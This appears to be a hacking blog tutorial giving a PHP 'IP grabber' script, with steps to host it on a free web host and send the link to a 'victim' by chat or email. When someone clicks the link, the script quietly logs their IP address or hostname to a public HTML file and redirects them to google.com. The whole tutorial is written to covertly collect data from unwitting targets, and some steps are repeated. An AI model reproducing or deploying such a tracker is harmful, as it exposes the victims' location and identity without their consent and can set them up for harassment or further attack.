Hello Guys and Welcme to another tutorial ;
In this tutorial i will you show you how to get someone's Ip address using just a simple PHP script.This method can be used to grab someone Ip address on yahoo or Facebook chat or by sending mail to victim.
So Lets get started.
1. Copy the below codes into Notepad and save it as index.php (.php is must)
So Lets get started.
1. Copy the below codes into Notepad and save it as index.php (.php is must)
<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$file=fopen("Ip.html","a");
fwrite($file,"<head><title>Coded By Stormix-Blog</title></head><h1>Here is the ip :</h1><br>".$hostname."<br>+_______________Coded By Stormix__________________+");
fclose($file);
header('Refresh: 1; url=http://google.com');
echo "Please wait ...";
?>
2. Now make Free account on any of the free web hosting sites.I suggest "2FREEHOSTING" or "HOSTINGER".
3. Now Upload .php to your web hosting site.
4. Copy the link of your uploaded file and send it to victim.
5. As soon as victim will click on your link his ip will be saved in your free web hosting site.
6.Open this link "www.yourwebsite.com/Ip.html"
7. Enjoy you are Done !!
7. Enjoy you are Done !!
P.S : Note that everytime you grab the ip of a victime delete the file "Ip.html".
Tidak ada komentar:
Posting Komentar